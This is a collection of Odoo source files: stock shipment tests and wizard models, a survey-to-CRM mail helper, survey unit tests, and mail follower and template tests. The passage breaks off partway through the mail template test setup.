#### File: stock/tests/test_shipment.py
```python
from odoo.addons.stock.tests.common2 import TestStockCommon
class TestInventory(TestStockCommon):
def test_shipment(self):
# TDE TODO
# pickign.action_confirm -> confirm moves
# picking.do_prepare_partial, should create pack ops, write on it ?
# create and confirm an incoming move of product 3
incoming_move = self._create_move_in(self.product_3, self.warehouse_1, create_picking=True, product_uom_qty=50)
incoming_move._action_confirm()
# receive only 40 units of products; this will create a backorder of incoming shipment for the remaining 10
pack_operation = self._create_pack_operation(
self.product_3, 40.0, incoming_move.picking_id,
location_id=self.env.ref('stock.stock_location_suppliers').id, # TDE FIXME: locations
location_dest_id=self.location_1.id)
incoming_move.picking_id.with_context(active_model='stock.picking', active_id=incoming_move.picking_id.id, active_ids=[incoming_move.picking_id.id]).action_done()
# check backorder shipment after receiving partial shipment and check remaining shipment
for move_line in incoming_move.picking_id.move_lines:
self.assertEqual(move_line.product_qty, 40)
self.assertEqual(move_line.state, 'done')
backorder = self.env['stock.picking'].search([('backorder_id', '=', incoming_move.picking_id.id)])
for move_line in backorder.move_lines:
self.assertEqual(move_line.product_qty, 10)
self.assertIn(move_line.state, ['assigned', 'waiting', 'confirmed'])
backorder.with_context(active_model='stock.picking', active_id=backorder.id, active_ids=[backorder.id])
# receive the remaining 10 units from the backorder
pack_operation = self._create_pack_operation(
self.product_3, 10.0, backorder,
location_id=self.env.ref('stock.stock_location_suppliers').id, # TDE FIXME: locations
location_dest_id=self.location_1.id)
backorder.action_done()
# check the incoming shipment after receipt
backorder = self.env['stock.picking'].search([('backorder_id', '=', incoming_move.picking_id.id)])
self.assertEqual(backorder.state, 'done')
for move_line in backorder.move_lines:
self.assertEqual(move_line.state, 'done')
```
#### File: stock/wizard/stock_backorder_confirmation.py
```python
from odoo import api, fields, models, _
from odoo.tools.float_utils import float_compare
class StockBackorderConfirmation(models.TransientModel):
_name = 'stock.backorder.confirmation'
_description = 'Backorder Confirmation'
pick_ids = fields.Many2many('stock.picking', 'stock_picking_backorder_rel')
@api.one
def _process(self, cancel_backorder=False):
if cancel_backorder:
for pick_id in self.pick_ids:
moves_to_log = {}
for move in pick_id.move_lines:
if float_compare(move.product_uom_qty, move.quantity_done, precision_rounding=move.product_uom.rounding) > 0:
moves_to_log[move] = (move.quantity_done, move.product_uom_qty)
pick_id._log_less_quantities_than_expected(moves_to_log)
self.pick_ids.action_done()
if cancel_backorder:
for pick_id in self.pick_ids:
backorder_pick = self.env['stock.picking'].search([('backorder_id', '=', pick_id.id)])
backorder_pick.action_cancel()
pick_id.message_post(body=_("Back order <em>%s</em> <b>cancelled</b>.") % (",".join([b.name or '' for b in backorder_pick])))
def process(self):
self._process()
def process_cancel_backorder(self):
self._process(cancel_backorder=True)
```
#### File: stock/wizard/stock_package_destination.py
```python
from odoo import api, fields, models
class ChooseDestinationLocation(models.TransientModel):
_name = 'stock.package.destination'
_description = 'Stock Package Destination'
picking_id = fields.Many2one('stock.picking', required=True)
move_line_ids = fields.Many2many('stock.move.line', 'Products', compute='_compute_move_line_ids', required=True)
location_dest_id = fields.Many2one('stock.location', 'Destination location', required=True)
filtered_location = fields.One2many(comodel_name='stock.location', compute='_filter_location')
@api.one
@api.depends('picking_id')
def _compute_move_line_ids(self):
self.move_line_ids = self.picking_id.move_line_ids.filtered(lambda l: l.qty_done > 0 and not l.result_package_id)
@api.one
@api.depends('move_line_ids')
def _filter_location(self):
self.filtered_location = self.move_line_ids.mapped('location_dest_id')
def action_done(self):
# set the same location on each move line and pass again in _put_in_pack
for line in self.move_line_ids:
line.location_dest_id = self.location_dest_id
return self.picking_id.put_in_pack()
```
#### File: stock/wizard/stock_quantity_history.py
```python
from odoo import api, fields, models, _
class StockQuantityHistory(models.TransientModel):
_name = 'stock.quantity.history'
_description = 'Stock Quantity History'
compute_at_date = fields.Selection([
(0, 'Current Inventory'),
(1, 'At a Specific Date')
], string="Compute", help="Choose to analyze the current inventory or from a specific date in the past.")
date = fields.Datetime('Inventory at Date', help="Choose a date to get the inventory at that date", default=fields.Datetime.now)
def open_table(self):
self.ensure_one()
if self.compute_at_date:
tree_view_id = self.env.ref('stock.view_stock_product_tree').id
form_view_id = self.env.ref('stock.product_form_view_procurement_button').id
# We pass `to_date` in the context so that `qty_available` will be computed across
# moves until date.
action = {
'type': 'ir.actions.act_window',
'views': [(tree_view_id, 'tree'), (form_view_id, 'form')],
'view_mode': 'tree,form',
'name': _('Products'),
'res_model': 'product.product',
'domain': "[('type', '=', 'product')]",
'context': dict(self.env.context, to_date=self.date),
}
return action
else:
self.env['stock.quant']._merge_quants()
self.env['stock.quant']._unlink_zero_quants()
return self.env.ref('stock.quantsact').read()[0]
```
#### File: stock/wizard/stock_track_confirmation.py
```python
from odoo import api, models, fields, tools
class StockTrackConfirmation(models.TransientModel):
_name = 'stock.track.confirmation'
_description = 'Stock Track Confirmation'
tracking_line_ids = fields.One2many('stock.track.line', 'wizard_id')
inventory_id = fields.Many2one('stock.inventory', 'Inventory')
@api.one
def action_confirm(self):
return self.inventory_id._action_done()
class StockTrackingLines(models.TransientModel):
_name = 'stock.track.line'
_description = 'Stock Track Line'
product_id = fields.Many2one('product.product', 'Product', readonly=True)
tracking = fields.Selection([('lot', 'Tracked by lot'), ('serial', 'Tracked by serial number')], readonly=True)
wizard_id = fields.Many2one('stock.track.confirmation', readonly=True)
```
#### File: survey_crm/models/survey.py
```python
from odoo import api, models
class SurveyComposeMessage(models.TransientModel):
_inherit = 'survey.mail.compose.message'
@api.model
def default_get(self, fields):
result = super(SurveyComposeMessage, self).default_get(fields)
if self._context.get('active_model') == 'crm.lead' and self._context.get('active_ids'):
partner_ids = []
emails_list = []
for lead in self.env['crm.lead'].browse(self._context.get('active_ids')):
if lead.partner_id:
partner_ids.append(lead.partner_id.id)
else:
email = lead.contact_name and "%s <%s>" % (lead.contact_name, lead.email_from or "") or lead.email_from or None
if email and email not in emails_list:
emails_list.append(email)
multi_email = "\n".join(emails_list)
result.update({'partner_ids': list(set(partner_ids)), 'multi_email': multi_email})
return result
```
#### File: survey/tests/test_survey.py
```python
import random
import re
from collections import Counter
from itertools import product
from werkzeug import urls
from odoo import _
from odoo.addons.http_routing.models.ir_http import slug
from odoo.exceptions import UserError
from odoo.tests.common import TransactionCase
class TestSurvey(TransactionCase):
def setUp(self):
super(TestSurvey, self).setUp()
User = self.env['res.users'].with_context({'no_reset_password': True})
(group_survey_user, group_employee) = (self.ref('survey.group_survey_user'), self.ref('base.group_user'))
self.survey_manager = User.create({
'name': '<NAME>', 'login': 'Gustav','email': '<EMAIL>',
'groups_id': [(6, 0, [self.ref('survey.group_survey_manager'), group_survey_user, group_employee])]})
self.survey_user = User.create({
'name': '<NAME>', 'login': 'Lukas', 'email': '<EMAIL>',
'groups_id': [(6, 0, [group_survey_user, group_employee])]})
self.user_public = User.create({
'name': '<NAME>', 'login': 'Wout', 'email': '<EMAIL>',
'groups_id': [(6, 0, [self.ref('base.group_public')])]})
self.survey1 = self.env['survey.survey'].sudo(self.survey_manager).create({'title': "S0", 'page_ids': [(0, 0, {'title': "P0"})]})
self.page1 = self.survey1.page_ids[0]
def test_00_create_minimal_survey(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({'page_id': self.page1.id, 'question': 'Q0'})
self.assertEqual(self.survey1.title, "S0", msg="Title of the survey is somehow modified.")
self.assertEqual(len(self.survey1.page_ids), 1, msg="Additional Pages are linked with the survey after creation.")
self.assertEqual(self.page1.title, "P0", msg="Title of the page is somehow modified.")
self.assertEqual(len(self.page1.question_ids), 1, msg="Additional questions are linked with the page after creation.")
self.assertEqual(question.question, "Q0", msg="Title of the Question is somehow modified.")
def test_01_question_type_validation_save_line_function(self):
for (question_type, text) in self.env['survey.question']._fields['type'].selection:
# Each question ype must have validation function.
self.assertTrue(hasattr(self.env['survey.question'], 'validate_' + question_type), msg="Question must have a validation method in\
the form of 'validate_' followed by the name of the type.")
# Survey Input Lines must have validation function for each line.
self.assertTrue(hasattr(self.env['survey.user_input_line'], 'save_line_' + question_type), msg="Inputline must have Save method in \
the form of 'save_line_' followed by the name of the type.")
def test_02_question_answer_required(self):
for (question_type, text) in self.env['survey.question']._fields['type'].selection:
# Blank value of field is not accepted for mandatory questions.
if question_type == 'multiple_choice':
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'multiple_choice',
'constr_mandatory': True, 'constr_error_msg': 'Error',
'labels_ids': [(0, 0, {'value': "MChoice0", "quizz_mark": 0}), (0, 0, {'value': "MChoice1", "quizz_mark": 0})]})
elif question_type == 'matrix':
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'matrix', 'matrix_subtype': 'simple',
'constr_mandatory': True, 'constr_error_msg': 'Error',
'labels_ids': [(0, 0, {'value': "Column0", "quizz_mark": 0}), (0, 0, {'value': "Column1", "quizz_mark": 0})],
'labels_ids_2': [(0, 0, {'value': "Row0", "quizz_mark": 0}), (0, 0, {'value': "Row1", "quizz_mark": 0})]})
else:
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': question_type, 'constr_mandatory': True, 'constr_error_msg': 'Error'})
answer_tag = '%s_%s_%s' % (self.survey1.id, self.page1.id, question.id)
self.assertDictEqual({answer_tag: "Error"}, question.validate_question({answer_tag: ''}, answer_tag),
msg=("Validation function for type %s is unable to generate error if it is mandatory and answer is blank." % question_type))
def test_03_question_textbox(self):
questions = [
self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'textbox', 'validation_email': True}),
self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q1', 'type': 'textbox', 'validation_required': True,
'validation_length_min': 2, 'validation_length_max': 8, 'validation_error_msg': "Error"})]
results = [('test @ testcom', _('This answer must be an email address')), ('t', 'Error')]
for i in range(len(questions)):
answer_tag = '%s_%s_%s' % (self.survey1.id, self.page1.id, questions[i].id)
self.assertEqual(questions[i].validate_question({answer_tag: results[i][0]}, answer_tag), {answer_tag: results[i][1]}, msg="\
Validation function for textbox is unable to notify if answer is violating the validation rules")
def test_04_question_numerical_box(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'numerical_box', 'validation_required': True,
'validation_min_float_value': 2.1, 'validation_max_float_value': 3.0, 'validation_error_msg': "Error"})
answer_tag = '%s_%s_%s' % (self.survey1.id, self.page1.id, question.id)
results = [('aaa', _('This is not a number')), ('4.5', 'Error'), ('0.1', 'Error')]
for i in range(len(results)):
self.assertEqual(question.validate_question({answer_tag: results[i][0]}, answer_tag), {answer_tag: results[i][1]}, msg="\
Validation function for type numerical_box is unable to notify if answer is violating the validation rules")
def test_05_question_date(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'date', 'validation_required': True,
'validation_min_date': '2015-03-20', 'validation_max_date': '2015-03-25', 'validation_error_msg': "Error"})
answer_tag = '%s_%s_%s' % (self.survey1.id, self.page1.id, question.id)
results = [('2015-55-10', _('This is not a date')), ('2015-03-19', 'Error'), ('2015-03-26', 'Error')]
for i in range(len(results)):
self.assertEqual(question.validate_question({answer_tag: results[i][0]}, answer_tag), {answer_tag: results[i][1]}, msg="\
Validation function for type date is unable to notify if answer is violating the validation rules")
def test_06_survey_sharing(self):
# Case-1: Executing action with correct data.
correct_survey = self.env['survey.survey'].sudo(self.survey_manager).create({
'title': "S0", 'stage_id': self.env['survey.stage'].search([('sequence', '=', 1)]).id,
'page_ids': [(0, 0, {'title': "P0", 'question_ids': [(0, 0, {'question': "Q0", 'type': 'free_text'})]})]})
action = correct_survey.action_send_survey()
template = self.env.ref('survey.email_template_survey', raise_if_not_found=False)
ctx = dict(
self.env.context,
default_model='survey.survey',
default_res_id=correct_survey.id,
default_survey_id=correct_survey.id,
default_use_template=bool(template),
default_template_id=template and template.id or False,
default_composition_mode='comment',
notif_layout='mail.mail_notification_light',
)
self.assertDictEqual(action, {
'type': 'ir.actions.act_window',
'view_type': 'form',
'view_mode': 'form',
'res_model': 'survey.mail.compose.message',
'target': 'new',
'context': ctx,
})
# Case-2: Executing action with incorrect data.
surveys = [
self.env['survey.survey'].sudo(self.survey_manager).create({ # Survey without any page or question.
'title': "Test survey"}),
self.env['survey.survey'].sudo(self.survey_manager).create({ # Closed Survey.
'title': "S0", 'stage_id': self.env['survey.stage'].search([('closed', '=', True)]).id, # Getting Closed stage id.
'page_ids': [(0, 0, {'title': "P0", 'question_ids': [(0, 0, {'question': "Q0", 'type': 'free_text'})]})]})]
for survey in surveys:
self.assertRaises(UserError, survey.action_send_survey)
def test_07_survey_email_message(self):
# Case-1: Executing send_mail with correct data.
partner = self.env['res.partner'].create({'name': '<NAME>', 'email': '<EMAIL>'})
survey_mail_message = self.env['survey.mail.compose.message'].sudo(self.survey_manager).create({
'survey_id': self.survey1.id, 'public': 'email_public_link', 'body': '__URL__', 'partner_ids': [(4, partner.id)]})
survey_mail_message.send_mail()
# Case-2: Executing send_mail with incorrect data.
mail_messages = [
self.env['survey.mail.compose.message'].sudo(self.survey_manager).create({ # Mail Message without __URL__ in body.
'survey_id': self.survey1.id, 'public': 'email_public_link'}),
self.env['survey.mail.compose.message'].sudo(self.survey_manager).create({ # Mail Message without recipents.
'survey_id': self.survey1.id, 'public': 'email_public_link', 'body': "__URL__"})]
for message in mail_messages:
self.assertRaises(UserError, message.send_mail)
def test_08_survey_urls(self):
def validate_url(url):
""" Reference: https://github.com/django/django/blob/master/django/core/validators.py """
url_regex = re.compile(
r'^https?://' # http:// or https://
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?)|' # domain...
r'localhost|' # localhost...
r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}|' # ...or ipv4
r'\[?[A-F0-9]*:[A-F0-9:]+\]?)' # ...or ipv6
r'(?::\d+)?' # optional port
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
return True if url_regex.match(url) else False
base_url = self.env['ir.config_parameter'].get_param('web.base.url')
urltypes = {'public': 'start', 'print': 'print', 'result': 'results'}
for urltype, urltxt in urltypes.items():
survey_url = getattr(self.survey1, urltype + '_url')
survey_url_relative = getattr(self.survey1.with_context({'relative_url': True}), urltype + '_url')
self.assertTrue(validate_url(survey_url))
url = "survey/%s/%s" % (urltxt, slug(self.survey1))
full_url = urls.url_join(base_url, url)
self.assertEqual(full_url, survey_url)
self.assertEqual('/' + url, survey_url_relative)
if urltype == 'public':
url_html = '<a href="%s">Click here to start survey</a>'
self.assertEqual(url_html % full_url, getattr(self.survey1, urltype + '_url_html'), msg="Public URL is incorrect")
self.assertEqual(url_html % ('/' + url), getattr(self.survey1.with_context({'relative_url': True}), urltype + '_url_html'), msg="Public URL is incorrect.")
def test_09_answer_survey(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({'page_id': self.page1.id, 'question': 'Q0'})
input_portal = self.env['survey.user_input'].sudo(self.survey_user).create({
'survey_id': self.survey1.id,
'partner_id': self.survey_user.partner_id.id,
'user_input_line_ids': [(0, 0, {
'skipped': False, 'answer_type': 'free_text', 'value_free_text': "Test Answer",
'survey_id': self.survey1.id, 'question_id': question.id})]})
input_public = self.env['survey.user_input'].sudo(self.user_public).create({
'survey_id': self.survey1.id,
'partner_id': self.survey_user.partner_id.id,
'user_input_line_ids': [(0, 0, {
'skipped': False, 'answer_type': 'free_text', 'value_free_text': "Test Answer",
'survey_id': self.survey1.id, 'question_id': question.id})]})
answers = [input_portal.user_input_line_ids[0], input_public.user_input_line_ids[0]]
expected_values = {'answer_type': 'free_text', 'value_free_text': "Test Answer"}
for answer in answers:
for field, value in expected_values.items():
self.assertEqual(answer[field], value, msg="Unable to answer the survey. Expected behaviour of %s is not proper." % (field))
def test_10_survey_result_simple_multiple_choice(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'simple_choice',
'labels_ids': [(0, 0, {'value': "Choice0", 'quizz_mark': 0}), (0, 0, {'value': "Choice1", 'quizz_mark': 0})]})
for i in range(3):
self.env['survey.user_input'].sudo(self.user_public).create({'survey_id': self.survey1.id, 'user_input_line_ids': [(0, 0, {
'question_id': question.id,
'answer_type': 'suggestion',
'value_suggested': random.choice(question.labels_ids.ids)})]})
lines = [line.value_suggested.id for line in question.user_input_line_ids]
answers = [{'text': label.value, 'count': lines.count(label.id), 'answer_id': label.id} for label in question.labels_ids]
prp_result = self.env['survey.survey'].prepare_result(question)['answers']
self.assertItemsEqual(prp_result, answers, msg="Statistics of simple, multiple choice questions are different from expectation")
def test_11_survey_result_matrix(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({
'page_id': self.page1.id, 'question': 'Q0', 'type': 'matrix', 'matrix_subtype': 'simple',
'labels_ids': [(0, 0, {'value': "Column0", "quizz_mark": 0}), (0, 0, {'value': "Column1", "quizz_mark": 0})],
'labels_ids_2': [(0, 0, {'value': "Row0", "quizz_mark": 0}), (0, 0, {'value': "Row1", "quizz_mark": 0})]})
for i in range(3):
self.env['survey.user_input'].sudo(self.user_public).create({'survey_id': self.survey1.id, 'user_input_line_ids': [(0, 0, {
'question_id': question.id, 'answer_type': 'suggestion', 'value_suggested': random.choice(question.labels_ids.ids),
'value_suggested_row': random.choice(question.labels_ids_2.ids)})]})
lines = [(line.value_suggested_row.id, line.value_suggested.id) for line in question.user_input_line_ids]
res = {}
for i in product(question.labels_ids_2.ids, question.labels_ids.ids):
res[i] = lines.count((i))
self.assertEqual(self.env['survey.survey'].prepare_result(question)['result'], res, msg="Statistics of matrix type questions are different from expectations")
def test_12_survey_result_numeric_box(self):
question = self.env['survey.question'].sudo(self.survey_manager).create({'page_id': self.page1.id, 'question': 'Q0', 'type': 'numerical_box'})
num = [float(n) for n in random.sample(range(1, 100), 3)]
nsum = sum(num)
for i in range(3):
self.env['survey.user_input'].sudo(self.user_public).create({'survey_id': self.survey1.id, 'user_input_line_ids': [(0, 0, {
'question_id': question.id, 'answer_type': 'number', 'value_number': num[i]})]})
exresult = {
'average': round((nsum / len(num)), 2), 'max': round(max(num), 2),
'min': round(min(num), 2), 'sum': nsum, 'most_common': Counter(num).most_common(5)}
result = self.env['survey.survey'].prepare_result(question)
for key in exresult:
self.assertEqual(result[key], exresult[key], msg="Statistics of numeric box type questions are different from expectations")
def test_13_survey_actions(self):
self.env['survey.question'].sudo(self.survey_manager).create({'page_id': self.page1.id, 'question': 'Q0', 'type': 'numerical_box'})
actions = {
'start': {'method': 'public', 'token': '/test', 'text': 'Start'},
'print': {'method': 'print', 'token': '/test', 'text': 'Print'},
'result': {'method': 'result', 'token': '', 'text': 'Results of the'},
'test': {'method': 'public', 'token': '/<PASSWORD>', 'text': 'Results of the'}}
for action, val in actions.items():
result = getattr(self.survey1.with_context({'survey_token': val['token'][1:]}), 'action_' + action + '_survey')()
url = getattr(self.survey1.with_context({'relative_url': True}), val['method'] + '_url') + val['token']
self.assertEqual(result['url'], url)
```
#### File: test_mail/tests/test_mail_followers.py
```python
from psycopg2 import IntegrityError
from odoo.addons.test_mail.tests import common
from odoo.addons.test_mail.tests.common import mail_new_test_user
from odoo.tools.misc import mute_logger
class BaseFollowersTest(common.BaseFunctionalTest):
@classmethod
def setUpClass(cls):
super(BaseFollowersTest, cls).setUpClass()
Subtype = cls.env['mail.message.subtype']
cls.mt_mg_def = Subtype.create({'name': 'mt_mg_def', 'default': True, 'res_model': 'mail.test.simple'})
cls.mt_cl_def = Subtype.create({'name': 'mt_cl_def', 'default': True, 'res_model': 'mail.test'})
cls.mt_al_def = Subtype.create({'name': 'mt_al_def', 'default': True, 'res_model': False})
cls.mt_mg_nodef = Subtype.create({'name': 'mt_mg_nodef', 'default': False, 'res_model': 'mail.test.simple'})
cls.mt_al_nodef = Subtype.create({'name': 'mt_al_nodef', 'default': False, 'res_model': False})
cls.mt_mg_def_int = cls.env['mail.message.subtype'].create({'name': 'mt_mg_def', 'default': True, 'res_model': 'mail.test.simple', 'internal': True})
cls.default_group_subtypes = Subtype.search([('default', '=', True), '|', ('res_model', '=', 'mail.test.simple'), ('res_model', '=', False)])
cls.default_group_subtypes_portal = Subtype.search([('internal', '=', False), ('default', '=', True), '|', ('res_model', '=', 'mail.test.simple'), ('res_model', '=', False)])
def test_field_message_is_follower(self):
test_record = self.test_record.sudo(self.user_employee)
followed_before = test_record.search([('message_is_follower', '=', True)])
self.assertFalse(test_record.message_is_follower)
test_record.message_subscribe(partner_ids=[self.user_employee.partner_id.id])
followed_after = test_record.search([('message_is_follower', '=', True)])
self.assertTrue(test_record.message_is_follower)
self.assertEqual(followed_before | test_record, followed_after)
def test_field_followers(self):
test_record = self.test_record.sudo(self.user_employee)
test_record.message_subscribe(partner_ids=[self.user_employee.partner_id.id, self.user_admin.partner_id.id], channel_ids=[self.channel_listen.id])
followers = self.env['mail.followers'].search([
('res_model', '=', 'mail.test.simple'),
('res_id', '=', test_record.id)])
self.assertEqual(followers, test_record.message_follower_ids)
self.assertEqual(test_record.message_partner_ids, self.user_employee.partner_id | self.user_admin.partner_id)
self.assertEqual(test_record.message_channel_ids, self.channel_listen)
def test_followers_subtypes_default(self):
test_record = self.test_record.sudo(self.user_employee)
test_record.message_subscribe(partner_ids=[self.user_employee.partner_id.id])
self.assertEqual(test_record.message_partner_ids, self.user_employee.partner_id)
follower = self.env['mail.followers'].search([
('res_model', '=', 'mail.test.simple'),
('res_id', '=', test_record.id),
('partner_id', '=', self.user_employee.partner_id.id)])
self.assertEqual(follower, test_record.message_follower_ids)
self.assertEqual(follower.subtype_ids, self.default_group_subtypes)
def test_followers_subtypes_default_internal(self):
user_portal = mail_new_test_user(self.env, login='chell', groups='base.group_portal', name='<NAME>')
test_record = self.test_record.sudo(self.user_employee)
test_record.message_subscribe(partner_ids=[user_portal.partner_id.id])
self.assertEqual(test_record.message_partner_ids, user_portal.partner_id)
follower = self.env['mail.followers'].search([
('res_model', '=', 'mail.test.simple'),
('res_id', '=', test_record.id),
('partner_id', '=', user_portal.partner_id.id)])
self.assertEqual(follower.subtype_ids, self.default_group_subtypes_portal)
def test_followers_subtypes_specified(self):
test_record = self.test_record.sudo(self.user_employee)
test_record.message_subscribe(partner_ids=[self.user_employee.partner_id.id], subtype_ids=[self.mt_mg_nodef.id])
self.assertEqual(test_record.message_partner_ids, self.user_employee.partner_id)
follower = self.env['mail.followers'].search([
('res_model', '=', 'mail.test.simple'),
('res_id', '=', test_record.id),
('partner_id', '=', self.user_employee.partner_id.id)])
self.assertEqual(follower, test_record.message_follower_ids)
self.assertEqual(follower.subtype_ids, self.mt_mg_nodef)
def test_followers_multiple_subscription_force(self):
test_record = self.test_record.sudo(self.user_employee)
test_record.message_subscribe(partner_ids=[self.user_admin.partner_id.id], subtype_ids=[self.mt_mg_nodef.id])
self.assertEqual(test_record.message_partner_ids, self.user_admin.partner_id)
self.assertEqual(test_record.message_channel_ids, self.env['mail.channel'])
self.assertEqual(test_record.message_follower_ids.subtype_ids, self.mt_mg_nodef)
test_record.message_subscribe(partner_ids=[self.user_admin.partner_id.id], subtype_ids=[self.mt_mg_nodef.id, self.mt_al_nodef.id])
self.assertEqual(test_record.message_partner_ids, self.user_admin.partner_id)
self.assertEqual(test_record.message_channel_ids, self.env['mail.channel'])
self.assertEqual(test_record.message_follower_ids.subtype_ids, self.mt_mg_nodef | self.mt_al_nodef)
def test_followers_multiple_subscription_noforce(self):
test_record = self.test_record.sudo(self.user_employee)
test_record.message_subscribe(partner_ids=[self.user_admin.partner_id.id], subtype_ids=[self.mt_mg_nodef.id, self.mt_al_nodef.id])
self.assertEqual(test_record.message_partner_ids, self.user_admin.partner_id)
self.assertEqual(test_record.message_channel_ids, self.env['mail.channel'])
self.assertEqual(test_record.message_follower_ids.subtype_ids, self.mt_mg_nodef | self.mt_al_nodef)
# set new subtypes with force=False, meaning no rewriting of the subscription is done -> result should not change
test_record.message_subscribe(partner_ids=[self.user_admin.partner_id.id])
self.assertEqual(test_record.message_partner_ids, self.user_admin.partner_id)
self.assertEqual(test_record.message_channel_ids, self.env['mail.channel'])
self.assertEqual(test_record.message_follower_ids.subtype_ids, self.mt_mg_nodef | self.mt_al_nodef)
def test_followers_no_DID(self):
"""Test that a follower cannot suffer from dissociative identity disorder.
It cannot be both a partner and a channel.
"""
with self.assertRaises(IntegrityError), mute_logger('odoo.sql_db'):
self.env['mail.followers'].create({
'res_model': self.test_record._name,
'res_id': self.test_record.id,
'partner_id': self.user_employee.partner_id.id,
'channel_id': self.channel_listen.id,
})
class AdvancedFollowersTest(common.BaseFunctionalTest):
@classmethod
def setUpClass(cls):
super(AdvancedFollowersTest, cls).setUpClass()
cls.user_portal = mail_new_test_user(cls.env, login='chell', groups='base.group_portal', name='<NAME>')
cls.test_track = cls.env['mail.test.track'].sudo(cls.user_employee).create({
'name': 'Test',
})
Subtype = cls.env['mail.message.subtype']
# clean demo data to avoid interferences
Subtype.search([('res_model', 'in', ['mail.test', 'mail.test.track'])]).unlink()
cls.sub_nodef = Subtype.create({'name': 'Sub NoDefault', 'default': False, 'res_model': 'mail.test'})
cls.sub_umb1 = Subtype.create({'name': 'Sub Umbrella1', 'default': False, 'res_model': 'mail.test.track'})
cls.sub_umb2 = Subtype.create({'name': 'Sub Umbrella2', 'default': False, 'res_model': 'mail.test.track'})
cls.umb_def = Subtype.create({'name': 'Umbrella Default', 'default': True, 'res_model': 'mail.test'})
# create subtypes for auto subscription from umbrella to sub records
cls.umb_sub_def = Subtype.create({
'name': 'Umbrella Sub1', 'default': True, 'res_model': 'mail.test',
'parent_id': cls.sub_umb1.id, 'relation_field': 'umbrella_id'})
cls.umb_sub_nodef = Subtype.create({
'name': 'Umbrella Sub2', 'default': False, 'res_model': 'mail.test',
'parent_id': cls.sub_umb2.id, 'relation_field': 'umbrella_id'})
def test_auto_subscribe_create(self):
""" Creator of records are automatically added as followers """
self.assertEqual(self.test_track.message_partner_ids, self.user_employee.partner_id)
def test_auto_subscribe_post(self):
""" People posting a message are automatically added as followers """
self.test_track.sudo(self.user_admin).message_post(body='Coucou hibou', message_type='comment')
self.assertEqual(self.test_track.message_partner_ids, self.user_employee.partner_id | self.user_admin.partner_id)
def test_auto_subscribe_post_email(self):
""" People posting an email are automatically added as followers """
self.test_track.sudo(self.user_admin).message_post(body='Coucou hibou', message_type='email')
self.assertEqual(self.test_track.message_partner_ids, self.user_employee.partner_id | self.user_admin.partner_id)
def test_auto_subscribe_not_on_notification(self):
""" People posting an automatic notification are not subscribed """
self.test_track.sudo(self.user_admin).message_post(body='Coucou hibou', message_type='notification')
self.assertEqual(self.test_track.message_partner_ids, self.user_employee.partner_id)
def test_auto_subscribe_responsible(self):
""" Responsibles are tracked and added as followers """
sub = self.env['mail.test.track'].sudo(self.user_employee).create({
'name': 'Test',
'user_id': self.user_admin.id,
})
self.assertEqual(sub.message_partner_ids, (self.user_employee.partner_id | self.user_admin.partner_id))
def test_auto_subscribe_defaults(self):
""" Test auto subscription based on an umbrella record. This mimics
the behavior of addons like project and task where subscribing to
some project's subtypes automatically subscribe the follower to its tasks.
Functional rules applied here
* subscribing to an umbrella subtype with parent_id / relation_field set
automatically create subscription with matching subtypes
* subscribing to a sub-record as creator applies default subtype values
* portal user should not have access to internal subtypes
"""
umbrella = self.env['mail.test'].with_context(common.BaseFunctionalTest._test_context).create({
'name': 'Project-Like',
})
umbrella.message_subscribe(partner_ids=[self.user_portal.partner_id.id])
self.assertEqual(umbrella.message_partner_ids, self.user_portal.partner_id)
sub1 = self.env['mail.test.track'].sudo(self.user_employee).create({
'name': 'Task-Like Test',
'umbrella_id': umbrella.id,
})
all_defaults = self.env['mail.message.subtype'].search([('default', '=', True), '|', ('res_model', '=', 'mail.test.track'), ('res_model', '=', False)])
external_defaults = all_defaults.filtered(lambda subtype: not subtype.internal)
self.assertEqual(sub1.message_partner_ids, self.user_portal.partner_id | self.user_employee.partner_id)
self.assertEqual(
sub1.message_follower_ids.filtered(lambda fol: fol.partner_id == self.user_portal.partner_id).subtype_ids,
external_defaults | self.sub_umb1)
self.assertEqual(
sub1.message_follower_ids.filtered(lambda fol: fol.partner_id == self.user_employee.partner_id).subtype_ids,
all_defaults)
```
#### File: test_mail/tests/test_mail_template.py
```python
import base64
from datetime import datetime, timedelta
from unittest.mock import patch
from odoo.addons.test_mail.tests.common import BaseFunctionalTest, MockEmails, TestRecipients
from odoo.addons.test_mail.tests.common import mail_new_test_user
from odoo.tools import mute_logger, DEFAULT_SERVER_DATETIME_FORMAT
class TestMailTemplate(BaseFunctionalTest, MockEmails, TestRecipients):
def setUp(self):
super(TestMailTemplate, self).setUp()
self.user_employee.write({
'groups_id': [(4, self.env.ref('base.group_partner_manager').id)],
})
self._attachments = [{
'name': '_Test_First',
'datas_fname': 'first.txt',
'datas': base64.b64encode(b'My first attachment'),
'res_model': 'res.partner',
'res_id': self.user_admin.partner_id.id
}, {
'name': '_Test_Second',
'datas_fname': 'second.txt',
'datas': base64.b64encode(b'My second attachment'),
'res_model': 'res.partner',
'res_id': self.user_admin.partner_id.id
}]
self.email_1 = '<EMAIL>'
self.email_2 = '<EMAIL>'
self.email_3 = self.partner_1.email
self.email_template = self.env['mail.template'].create({
'model_id': self.env['ir.model']._get('mail.test.simple').id,
'name': 'Pigs Template',
'subject': '${object.name}',
'body_html': '${object.email_from}',
'user_signature': False,
'attachment_ids': [(0, 0, self._attachments[0]), (0, 0, self._attachments[1])],
